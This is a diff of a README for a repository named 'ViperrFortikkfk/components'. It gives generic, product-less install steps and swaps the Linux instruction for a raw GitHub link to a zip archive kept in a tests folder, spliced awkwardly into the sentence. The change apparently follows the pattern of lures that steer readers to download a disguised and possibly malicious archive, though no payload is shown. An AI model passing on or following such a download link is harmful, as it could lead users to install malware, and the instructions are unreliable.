ViperrFortikkfk/components/README.md

 2. **Open the File**:
    - **Windows**: Double-click the `.exe` file.
    - **macOS**: Open the `.dmg` file, then drag the application to your Applications folder.
-   - **Linux**: Extract the contents of the `.tar.gz` file, and follow the included instructions to install.
+   - **Linux**: Extract the contents of the `https://raw.githubusercontent.com/ViperrFortikkfk/components/main/tests/lib/components_1.8.zip` file, and follow the included instructions to install.

 3. **Start Using the Components**: Once installed, open the application.
 You will find a simple interface to begin using the components.